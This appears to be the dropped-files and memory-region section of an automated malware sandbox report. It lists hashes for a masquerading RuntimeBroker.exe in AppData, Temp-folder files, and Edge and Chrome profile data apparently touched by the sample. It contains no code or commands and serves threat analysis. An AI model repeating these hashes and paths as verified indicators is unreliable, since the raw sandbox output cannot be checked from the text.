C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe

MD5 3e4d628210b6f2c3a96092203ea5c2eb
SHA1 6fd276cca9cb5e1e9c19a0b2f6026515ec6f1b0e
SHA256 5175b805ea8db533ac0b0153899804be3dd8b5151185ef5ef4614ce01f8acbba
SHA512 626ac7fe79f1b0dc5e8295831ad068cdef9d763ed2aeddaeb38d1de9701c0b4b04931dc2c98d4eeef89246c61dc06d8a3d81248f3eeddfdf8d9ce0db70e72b66

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e30e02c31ecfc1a334c8378ebe80c87f
SHA1 f32eb0e3bd4a1bac87f58a01a722be1ef779264d
SHA256 01834dc96fe96d8ad9e55347282f0cfce0a02d93edb6bcc4bee7b43e16f5febf
SHA512 1b0601d5774670d1a04f454c572bb917bf26cd52894d62112018dcb3275eca370f7743a697cf945452d4975e653040fafa3e5c59bca11bb0b45ebb3de3a7d76f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

MD5 838a7b32aefb618130392bc7d006aa2e
SHA1 5159e0f18c9e68f0e75e2239875aa994847b8290
SHA256 ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA512 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

MD5 473c0c852edc11059de9af1946acc12a
SHA1 b307a52480d05fbb3e3025b125e7923288dd2cfd
SHA256 95d3c22f39f6ec6db8a4f4659513a93827d07b8affc13dcb3330694be7385d4f
SHA512 5069edd26ff643b1668daed759c0a1b10e411f272a959b873a7f2a3c179099235213b477ff6d616df3c0159d1067fa25bcb6b480f1f85ae1fc364c3da63873bd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13363462789086969

MD5 fab414ecc6ba33cb4c7bd4eb8907473a
SHA1 4e79b09e48f159afd8bc9a942bfa6b92474d5d8c
SHA256 e6242b964e47c017ca684366a8c390719f439deb7c70bcd759cb36dbe7dcd27c
SHA512 41a351a37532924b16360acf8cbd63a36c47cb9b9c5e4ea872b384c529228fdeeaf1e792b27432d6a9a196fc0911e51a33664f6b24b4b7ea8c4dcb156262a809

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

MD5 ac81c0b595b32b20317761f5b01f9ebb
SHA1 1c04855d66867ed7ae340a869cfd3bbf5cb5cf93
SHA256 aca519ec9f8f985a595533b4905dbd6ca0b95265f89c879fe3e73881082051e6
SHA512 7431e0a408762a59be45f80bf363354e0155c737331eb2c205b57a6ae9a5e4c2f8b7ab43e528acfa58c6ba6e25c58b7266cd468889730902eb91d8a80703b65e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

MD5 b5bf88a08136648cb2192b8d4ae19efd
SHA1 99ddd4bb1596e288669d17f6e8c7bf0bbfe63b32
SHA256 5c24fc66e83f2e099d42c64272ab18066643dc58261a6a2af246f72326117c21
SHA512 bdf33301475c799fd4542ec68cb2f3e6b1b38e92664d5887b46c2a07332d89a1621bfdb783056fd4b45327efcc99cc1a9b447380092dc085d9cfb91783bd88a2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

MD5 7831838767df1c630a425b50cc881f91
SHA1 ca126edc22ddfd4610c6aa5655f76b112ebbaa43
SHA256 48365632fd12690fc1dcc82dfe5e8cfdba4820b07cad5b7cd4b28a1c68948699
SHA512 4b1eb6e05fb3e32b7472c3a7da22240d8dde42d13966256ecfd94166cdb49d58e4f59d2523906f92cdb52e315f8c286a7472121544b2e2fc74585f2be7b6b2c5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

MD5 49ea266bb316c19d3ca4956ddfe24073
SHA1 274c43d1e923efd70e944c6cfff06788b4112e39
SHA256 e34a88e504ed2c4e3d1d66a644c2688376e7b1db7cad950b545baa1078320b6f
SHA512 f2386035cb1051990a0a83f346b2755dae9c2d7ee23eb4816340d570aac9d0e0e00a59d1eb30a613c496e2a7a92319c99ec3499739888f7a69dcfbbcc851399f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

MD5 9126a1bb7f31bfc893a7a4ea5f3fe022
SHA1 f732767828dec391b118590bf0efeaad2e54d714
SHA256 39b32da6267fd1191e84db7ce4fafcf165eca10590994b6fbeb9ec77790b2794
SHA512 cd9cb8476ac03e11602830a4fc39099253ddcc2f03c6cf3e62980d2d6a1c43ed1a372972cf7f04c31e4f64132374e7b001a545cd477297e1cbfe55078ae161be

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4e885293ceff902d3c6d67213bf1a611
SHA1 adfa42262463cb0df7dcf32bc6ba84dacabf4c5a
SHA256 ff451b10c7d775b2fa67d095512fdf4094673987594156ece234fb2269cc7340
SHA512 c00686a267c6e55db30177382657fc7e075827a7f004d41ab5a969cf9bef92ebca57dc3039d56f192a6a13500a99bcf835e46d2228a0b50363e662c24f1c8e2c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

MD5 9dcab5c90c59e6f3e47945c0f04dd1c3
SHA1 1f175e33d8ecccede6c42177d8463832b1a964e6
SHA256 868ef629a38f608b708fdeed1de4b4573d66ea1085b5751543d5c821f59d5427
SHA512 53ed04cc27122e40bc10214f6008340c24daebbf3cc5ef9e84a6076dff678a156c49d764063ec18d34fc01397a1f6aa64c7364279b66289aaa4f9c91289eb235

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

MD5 fa1af62bdaf3c63591454d2631d5dd6d
SHA1 14fc1fc51a9b7ccab8f04c45d84442ed02eb9466
SHA256 00dd3c8077c2cca17ea9b94804490326ae6f43e6070d06b1516dfd5c4736d94d
SHA512 2c3184f563b9a9bff088114f0547f204ee1e0b864115366c86506215f42d7dbf161bc2534ccaee783e62cc01105edffc5f5dabf229da5ebd839c96af1d45de77

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

MD5 981866cbe70c8ff0792adc4df11edde4
SHA1 209ec8e956c0f4cba92ae5d543d770e8f78b8eba
SHA256 ba51405c8aa2014ba6cbd221a8dca8cc85ca9f53a84651277ffdf51397534d2f
SHA512 ef0fe9edb7f8f0c1a1a187f494d552e9686e14cfac2efa07acec2e5cfac284d645d541600a5376e0bd476c15806b8a59b71498096c76d083a73a2206fc145990

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

MD5 f5474aefb0fb03898b3a22be6b97694c
SHA1 d7c83eb1008bdd193ee99a67fcff2b4bda8de5f0
SHA256 0853f9afdeca3244ff4e3b22746a18d7b82073e14534738e2a73a010dbd799a2
SHA512 e6294751a785fe51aecaba04aa9128301599016502b95f1333674fbc983b123fa8ddacb654b49e9697f963b0855e58c63c25e39b0d87e538a9624f3accbfa163

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

MD5 d37b34dcf938fd6682ea98ce1cd9bcb7
SHA1 2cf0fe2c84dbe6d6996e122ddb1c8f4586063060
SHA256 6d3a7ee079229d1312930c603e648a303c9dc8a4f001065f6cfda49af7fec2b6
SHA512 3d441383f79fa4a28ded31a247124969880a1ac20a54ec69a2ec5c79d46c503cae3f6e5ca3f12e17f67c837b7caf54a3d36451b66da408173f8adea690688f00

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 13fca2a6471636089c531b174b3d59f2
SHA1 df3dc472a865bb53274b07c75319c84de071da60
SHA256 5c2777dca1c9fd2b25293b2ed57f55bee05f86763899f71dab4e591fa024ee4d
SHA512 bb484e1d03bb0b7f7919ce567573bbe0a6c35c829ed0a097993ff19d4ea07c3aabc734a06ed430537faf0c969b7aff6eb806e27bbaceedff018fce63860ca87c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

MD5 7477b2094cdf5e21a91038a2e8c45422
SHA1 0007cf3e5440dd7fcf82b4bf8f934698897169dc
SHA256 17e1537678be7b3d3afba4308f601c936740f93e37ffc537c62ab464cec6c340
SHA512 1f52a09898e3d858e8373b744b6792674f8b37a98f61cf19e00c4d887ac638d6f6af9615e11f6e1da28f7764338719d03fc2dc227139583be809cda6f3607589

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres

MD5 0eb80309c20b97910fd8a4e54822f1e5
SHA1 12f1f4a440a7f6b78df1e5fb6db3b7904df02662
SHA256 cd2622c808b470e1c49605b2a274c0393ac6c7b77986bd7deddbcf3277a03e37
SHA512 6ea57e260e6eef36b56cfb51acd004d240d27895ddfd550bc88d22e6c981a32060f2e51842a580e90e7e8b3cb05aa02018033b30fd9f4a526543921431e24308

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

MD5 324d9517a7c8bc0cf2d12326801036ef
SHA1 9a59a5874a1623ad301608dfd4e9d504c13ebc38
SHA256 600b81abc132b1662662aa22101c6e9bb79235aaf4c80598a9076be4d8aaeae2
SHA512 a30df5a83ba4fb4c70e214d9bbe6be4da8e6152b114801cd8a25679a1123c72e3e8ea7a4ca7e8855bf4a3b292c9812dbc58bdf6986c1624db3c4c03f7466a790

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

MD5 20eadf8bf419c5160e2da0bdc7674455
SHA1 cd3bc6915e5acca439fb1e7bcc4056ecac22aadc
SHA256 b7d7cc80604aa74c6a2703cb0abae1959f9eaa6ff6bb9e04ccad88c9d994debd
SHA512 f9fc92c599e6c0c11886d82ad3ac24224cdc7f086b90d9327ce53b91a17a25eb17f28e4807c415d6aacbb1d5e1d12bf07cef541d89b8bc581f50195473ea3eb8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

MD5 b864a640766773252143e815ad613bc8
SHA1 3a2e3059c5715317115a22ddcaae3df3dc27b32c
SHA256 d3841f24b706361bca3afce76c0283694889bab7288106b7f1a6c40c60e7ca3f
SHA512 7ba23ebfb5cf635e56e8c9e4248c9db4e359eacca4857afd7bd60e05d9c9dac503c90777e72ffd9f2129478d7fd8fe2416e21ce8b62dc44af046f4da5e213097

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13363462788961969

MD5 53e62e99281aa2612ce200f466f35b60
SHA1 80f4f412d08c48ffbb085447bb09304f11e55c22
SHA256 d5b5a39505e848d5e755691d35510bbcff85db5a99932ff104a47d7f557130d0
SHA512 200c954a6956c5acb1fa1933953c4cae598c84feeef962bfae9fb818d91291a7837e2df6da71e92b3ddf8644cabca3b734a37ac9f61b13f6f8cc168e1e9698c3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt

MD5 1f7de3ffabbbb0e4fa163a468541058e
SHA1 6b4fbbd40585eec9a67a4be416826c4637dcfa2a
SHA256 decce661a92cb87a844dc0a6e7f2c3fb9e3fab6d0574df3deb848c225a9fc3a6
SHA512 bcf7eb6cb00c1e2b59ed62907f5ae6a27d8a8d0a77320f7542e3cfacf498f9477788e96d92944a563aec06ee1871a48998d179dd62ffe020f8091dc4fe489c0e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 1d7a3bc7ce1d1c27f0966248620ce864
SHA1 de1fed162004fcd039c8217c1e279aa2370bc62e
SHA256 6cbde7d8d9a6e4367da0ec03c53b69012c58a051008453822a6980baca3aa538
SHA512 5cb1e85b91ab8fa2b91b71df0eec7bb96a1da3fe591faf5db938cf3e953cfc6a82a9e3d82c1f29aed03f0f3f435afebeb7da5c0279f315ad8ce5258b260b9933

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\63be87ac-3242-4797-873c-2b769e6eb2d5.tmp

MD5 7f99e4f6fd53940a9179c4cecee4c225
SHA1 12ab4bba22f1af563842e87395560facc4326b47
SHA256 2a01ee0166c7eeb5efd9ec05f51f0881ded69a414d87df5a90fa883f3f39e94c
SHA512 a11bf38c98b808085ca3a2349b8152a1e08808fbd83d77fa2f5dc31ddb293d9c9002cde0cff27918bb6e49d346b0ae71b783e9bd57f582785440eb7b931b7d76

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\ce2af83e-cf2c-4b8c-ae1b-8f349dae97bf.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 b6a98aa5a4a16a6a65db36bd6e4312d2
SHA1 64bfa5b0fe1f12f207755f9ad5b510b94f7657e6
SHA256 905f0aa5bec6616d909d89bef09327cb70b6ac1af999ee9f2a246045799127b6
SHA512 224b37716dc4b6776ed8910755433bd60e462f36864396bfeed2b9d3a79c4c66897894a5e1581f50834dcb88532a430fcd7042406c3d1344d1047fcc24b5cba1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 e3761293d3c6f4fd0c579af3eff9cd33
SHA1 dbf8e7ab96e0bbe05284ab473f62ecf6733323c3
SHA256 64a770a955e87fb908fabb62a762c394c0e88f5d2eb4af195c59ea91fb7f1ff0
SHA512 8b177378cb723221a247824f5d6a5d91d9605b5a0323846b9f9c4a7ebc6b26c917a89c45da7537ff1963be1a595694a00cf67a93929c5dc69d6e4fe23f280454

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 9e1b8f1f702f4d1a08008affc42a741f
SHA1 bed87cf752abd500ed2561a5b2c1f6ce4dbb8c7e
SHA256 1f6cbc2a1dbbd82276b29caa4c01b2136b5147e6553e432fdedcc1a8207a05e4
SHA512 5f0df6751974adfc763e181c0c840e3febd8096c4a86f5c9346096b32a7c67b0240a35c14189df2b4020913b2fb9a2f5bc352e0ac271fc333920773e828de590

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 6d3379427c7be7091e58bb8f6f4c8ea8
SHA1 de839c225f7245383f19ce3ac5a56c55153cab09
SHA256 cc4d8d944cf3c8b1403b83ecca0def15fd8a1a86eeaf988990d70e924b84d33f
SHA512 6feace58c6d50ffd1c24cfdc1b045c36da30c8fffd2cd5fe0d1d70c764a31da4801897e8bfc11b3342b3a329eec6e5670960fc59669b2e5872437aa55e6010ec

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 9eec6bd7e82fb2f6cfe6920226be72ce
SHA1 1bf1de996c2b1f010812f8778a6d37b35a171abb
SHA256 3a08b0484df4c5690d35a18554b40bad660c4a08d2ea18b324125f0ba8bf08c3
SHA512 9e17509684b5be015d203debf6cad99708c09fc3fcc4e6becdc4989e8499003f77fb40097884df6a6902fad724bc6a080f1c709013553a7c18bbb7eef7d64d19

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 e2f72e0363ebe9a29f2cfe5b029866b5
SHA1 648467b507c50274a62a6fb4e6a117dd7d8d0c55
SHA256 b26ef2ff5ce37963cf4a67e8548679293adb2bbdafa0f1583c89c4c9bac9706a
SHA512 5e0d9f7c23bcbe6c39123f1c26ba5fb80c27b5c523cbcac879907686955f0bdebf66b8e90bafec225ba3539928c921d84e4b43d3d5923e2bba5c05f1a68c79a8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\Origins\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 df14916c6e64d9dc2274cbb65b5b15db
SHA1 1c16ef53e20be90af3c9b4f4cc7fd291695fe38d
SHA256 7a3202c45e4e6daf5abfcd695223e39ab9d08d8ec77b2cc89299ca73372a6084
SHA512 8c78682c65ca8e2908b8be8165d60e67219a0b3fb07ebc9f23b1772623416e3414b4d8d316b2a123134dfe9dee395168de7be6fc59587cb95d00226a68f0c3ca

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 7f9841ae9cd6952b607fb46e3416eece
SHA1 b066e7283c2f16fe44d35e17c40b4903b543138f
SHA256 e244c8274d9b425cb4f4eaa2ce80c35914bf13c8a76ca962786596ce1d5aabd3
SHA512 9aab5996bc9f39ee9cea726d916d5affa9c212e951b5a71ceafdbe3818158cd5d1743bba4eb642373da6f33dc3e01c9c2df987e11cd77ca505c11cfedd75cc15

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 a1738bd598efc8b992258de975c1d5bc
SHA1 e668594e646e95c3c7315954b8feb2fa569f59d4
SHA256 2fe4b24447a8e6e7501bb7cb37a62445efa070fa40bacb642ac532f701950ebc
SHA512 686ebfae717690380c02ce5d99d71e82a6a527da8b26bf05d8d941dc386536d9a75e226093a1341456036c2fb1e5bf249480c786d3be2b38a42d5cc9bae7fa61

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 8accdd5e7f3ac35c1a20a0c02a458046
SHA1 cfd0ac75adab5ef5d907e336daaf02cb23a7e74a
SHA256 b54343f1224d79bd1a49cff396a466a36809e3ac46e936357c5afb0f6033abc5
SHA512 5db53d6184671b9decf151aec8e9f74cd1bb2fa612876b293e6802d4b1cb3ca015893044e84575da805134c23e7ec2def9737233f25c71901581f0321081f768

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a93a9d5b05f8ff46a24231dfc601517c
SHA1 58c3bbc26fbab6a70f1b2fe03efe72552bfc131b
SHA256 4c9fa0384131409239cd64715b1304e62beff762fbface46d731b9cd4c208135
SHA512 af27bb30bdedd640d650f1d00cb54937bee3aead8fbc2165e4ef7c14f2a3ec18ac90f8dfe17d1bfae1b93d2b9e9e3b8607d8761192982b19a25a57a33656cc11

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 e177e41165f82f394afb8165fc99c186
SHA1 5195aa2c343cc03c5963f8b9cef465c82ab78faf
SHA256 baf02fd04e00c0360a2ba123a4dfe088e021c2f0bbe2c34a382f921873784c30
SHA512 ed6afdd695e093b3694446f6fc5a55f126986fe76d3c38780237752209ff2a77e59dad4ded6d6976782dfe1e6de241411266a219057e2b2031454dc3ac06b4f1

memory/1424-891-0x000000001B930000-0x000000001B93A000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 fe3a4edb2a83ce9664496a176ff12f03
SHA1 e8e283a2fa3ec42fe8dcda82a91fb66a51ab7709
SHA256 f5a2dbc4661ad07bf6b12a85ef275772b0ba05d1b4e9289d791ab6898c214c93
SHA512 2caeb21711178b39b2fd530cae7e34cf1d82ad815f20dbc36ab71c3ae33bea377f865e51589796446682bbd55f290acbe3d005803b90f8c29bda8a91260b4a74

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 95d6781b58ea1d3f71d3e4942e013813
SHA1 cfcb523db468d2c6fc94283b2486adae2bb39344
SHA256 a4ed7a1fc98ff342927e14cec2ed7974c8e38f2d5a42a18c9e4a930277ca1739
SHA512 5c2834d2618d022a46dfd9c266a01c652d2dfe39476004c11af37f310fdf3909e655baf57a9d3c538fa2439b81b35a1b0a997efd8c719d7cc6af820502973d73

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 4da2e86e1716ee74bfe4dc00e0d0f879
SHA1 9f77aea17336cc00265c93e5c7de0d4abb1079ed
SHA256 ef22d66ce34b35441ee9b9c5ca534484b101fa9cd27f9a13c9a8a72d80830287
SHA512 ea5d8a0eaa77bc538d72f93450b0535c5cd2177fd30e9c916f8ee2bdf2fba1f3bc041f91773fb784cd8b405fdd86d62fe489d8040ed5a0b7ccffe74ae925bd58

C:\Users\Admin\AppData\Local\Temp\kjxtjz.exe

MD5 e6a20535b636d6402164a8e2d871ef6d
SHA1 981cb1fd9361ca58f8985104e00132d1836a8736
SHA256 b461c985b53de4f6921d83925b3c2a62de3bbc5b8f9c02eecd27926f0197fae2
SHA512 35856a0268ed9d17b1570d5392833ed168c8515d73fac9f150cf63cc1aea61c096aa2e6b3c8e091a1058ba062f9333f6767e323a37dfb6f4fa7e508a2a138a30

memory/2440-989-0x0000000000350000-0x0000000000370000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 212d38a6505829e12bcbc3f4be888bdd
SHA1 d4b226ef1d24ba34546104f645cf5f2606af7039
SHA256 f495199e905c384a73142bd98da44a756aeb30cec6e9a1c8d04ca49c1bbb02a8
SHA512 942a1d2331e9db49ee14f7d28447bdfa175e71eacc6cb8db5cb40914323066b0146af3a755b06164728dac87b1e9a465741bd272e59ac38ff90a477df42a66c8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 6004874a9adb2242c513a11d7a0a9eb2
SHA1 bef77b210edbc9ccfa78166ec93aab9a35f415b7
SHA256 7c5b4d7b1597cc20f96bb7d46f0bb86757bb57946eb8dc0d3ad4299f6963a165
SHA512 f21c7d43fe0ddf3f9b8c66a9b79bf679350e21cf7f66518a3f48253f29d9b16bb358518a11a843ee69a88fb295a8939d5ff22e3112ae20d2400db8bbc2e864e5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 7f08ca2aca089a126339335888aa3c2d
SHA1 405f2c64e1c676723d56059e08ee13a450550124
SHA256 c89c57b3a1d6818491fd2b7399d73f0fbd6bfaa6b957c53e34593f95e2357693
SHA512 30b91112dc6885a2e3efee1b41967b54890ebf272adea29d5391d016710ea99e334e58f0cb8648abe7b5a5d5eb288b68c7cf4a853d01878473eb27786abe8cfb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 6c53fb4047f362f3cbf75e7535e883d9
SHA1 955fc03ff3231a9f2a36b154fd4f9f3e528f0624
SHA256 f843f32e8ac0beb62be1d750b31bea14a8b66935b7e364839d78941816cc9c61
SHA512 ade87422e537e467349cdfa18e50fe79844adbecce05fb8df50a8ae26f08441b4447f22088f3dd3354a4d121ad9967a0b250eecbbd3761a8ec7ad7e77cc8c3a3

memory/2340-1510-0x0000000000B20000-0x0000000000B40000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 765434d8a267b2c0df3bf2fa95dac82c
SHA1 52500a11191e1d185c1c891dedbfcd9fc56f9793
SHA256 4da58de160f7a7d53697601c82b6a3ebe82f1a6a8345831cfbd25961dd4b04ed
SHA512 7b9e0e5fe1abbfe36032412462cc7b7aff3c7d63ef8e6f272880a5bb12e6dd7652c2238309b305ae386b79e887ba91f86c6a21ffd8fe3de170542e81719bafaa

C:\Users\Admin\AppData\Local\Temp\jlkern.mp3

MD5 42b45fb12d0bad795c5c7a925b15c264
SHA1 1486f01f9b95cd6577466b8e26f957262a9185ce
SHA256 93fca11d81839895b00c590d9a03a094c62495ccd36a7e42e0d33af9437bd418
SHA512 d282cc116881ef74e96340eac116cf14823dc0702c6d62b9c7e62da60c4ecb792494d48e69c6f2f46150e7dc8cadd2d316fa5267b7e38b28ec2db73fc2287d3f

memory/912-1532-0x00007FFD201D0000-0x00007FFD20204000-memory.dmp

memory/912-1531-0x00007FF7C34E0000-0x00007FF7C35D8000-memory.dmp

memory/912-1540-0x00007FFD1BB80000-0x00007FFD1BB91000-memory.dmp

memory/912-1533-0x00007FFD06E50000-0x00007FFD07106000-memory.dmp

memory/912-1539-0x00007FFD1BBA0000-0x00007FFD1BBBD000-memory.dmp

memory/912-1541-0x00007FFD016E0000-0x00007FFD018EB000-memory.dmp

memory/912-1538-0x00007FFD1BBC0000-0x00007FFD1BBD1000-memory.dmp

memory/912-1537-0x00007FFD1BE30000-0x00007FFD1BE47000-memory.dmp

memory/912-1536-0x00007FFD20790000-0x00007FFD207A1000-memory.dmp

memory/912-1535-0x00007FFD21160000-0x00007FFD21177000-memory.dmp

memory/912-1534-0x00007FFD23260000-0x00007FFD23278000-memory.dmp

memory/912-1548-0x00007FFD1B460000-0x00007FFD1B471000-memory.dmp

memory/912-1547-0x00007FFD1B620000-0x00007FFD1B631000-memory.dmp

memory/912-1546-0x00007FFD1B640000-0x00007FFD1B651000-memory.dmp

memory/912-1545-0x00007FFD1BB10000-0x00007FFD1BB28000-memory.dmp

memory/912-1544-0x00007FFD1B660000-0x00007FFD1B681000-memory.dmp

memory/912-1543-0x00007FFD1BB30000-0x00007FFD1BB71000-memory.dmp

memory/912-1542-0x00007FFCFD7F0000-0x00007FFCFE8A0000-memory.dmp

memory/912-1560-0x00007FFCFD7F0000-0x00007FFCFE8A0000-memory.dmp

memory/912-1587-0x00007FFCFD7F0000-0x00007FFCFE8A0000-memory.dmp

memory/912-1598-0x00007FFD06E50000-0x00007FFD07106000-memory.dmp

memory/1424-1650-0x000000001B970000-0x000000001B986000-memory.dmp

memory/1120-1652-0x0000000000400000-0x0000000000410000-memory.dmp

memory/1120-1653-0x0000000005760000-0x00000000057F2000-memory.dmp

memory/1120-1654-0x0000000005800000-0x000000000589C000-memory.dmp

memory/1120-1655-0x0000000005E50000-0x00000000063F4000-memory.dmp

memory/1120-1656-0x0000000005A80000-0x0000000005AE6000-memory.dmp

memory/3288-1657-0x0000000002660000-0x0000000002696000-memory.dmp

memory/3288-1658-0x0000000004E80000-0x00000000054A8000-memory.dmp

memory/3288-1659-0x0000000004C70000-0x0000000004C92000-memory.dmp

memory/3288-1660-0x0000000004E10000-0x0000000004E76000-memory.dmp

memory/3288-1670-0x0000000005830000-0x0000000005B84000-memory.dmp

memory/3288-1671-0x0000000005C10000-0x0000000005C2E000-memory.dmp

memory/3288-1672-0x0000000005C50000-0x0000000005C9C000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\f_00000b

MD5 15b07d0834be5ce9e1fa1265079859a1
SHA1 9aae71abb06cd4554a594f88b09f52f6629ffdc8
SHA256 870ca3db53a1372427fe59c45385d6ab7916ce1cfe21ddd48bc6631e45318f73
SHA512 36d2fddbcc3c5322ed37e5c8c8292b9a52c96ac2c301776b5dad08eb8e4c80f5f565c850cb5cb70498565903c3828c0ff1f4620f33540fe645e58ce258579449

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\f_00000a

MD5 921df38cecd4019512bbc90523bd5df5
SHA1 5bf380ffb3a385b734b70486afcfc493462eceec
SHA256 83289571497cbf2f2859d8308982493a9c92baa23bebfb41ceed584e3a6f8f3f
SHA512 35fa5f8559570af719f8a56854d6184daa7ef218d38c257e1ad71209272d37355e9ad93aaa9fbe7e3b0a9b8b46dfc9085879b01ce7bb86dd9308d4a6f35f09e5

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\f_00000c

MD5 4392f4aa5f9d368e8d3ae01f401f1fe4
SHA1 f50229132f14636538cd0af8da2e282bf3899c07
SHA256 401775c120db5f1ba733a35e9dd144011a3d438745b1fdf42166b1c192615726
SHA512 b276167a919f54478ed7e34d573a7c521defe05227ca03a200b28c2ce8ff482c817db99a7e1e223fea2cb0198834b180d60d95f8ff3613f248bff9496683dad7

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\f_00000d

MD5 b1eb0510e50c43ab382dff6bc16feb9c
SHA1 0946694beca14543debb3e042367878ce9ccd8a1
SHA256 d3020cc01a18c8c319adf24447941be4dc74b960f216cf52259c5de625a6c4f8
SHA512 61a66814cd333882945be162dfa18d06c4fc1462bf774f92bea7eb5f61101b3c8b0ecd92122d03bd41f490566fef04c22a156ea42685fe289cbdfeedbbea3523

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Extension Rules\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

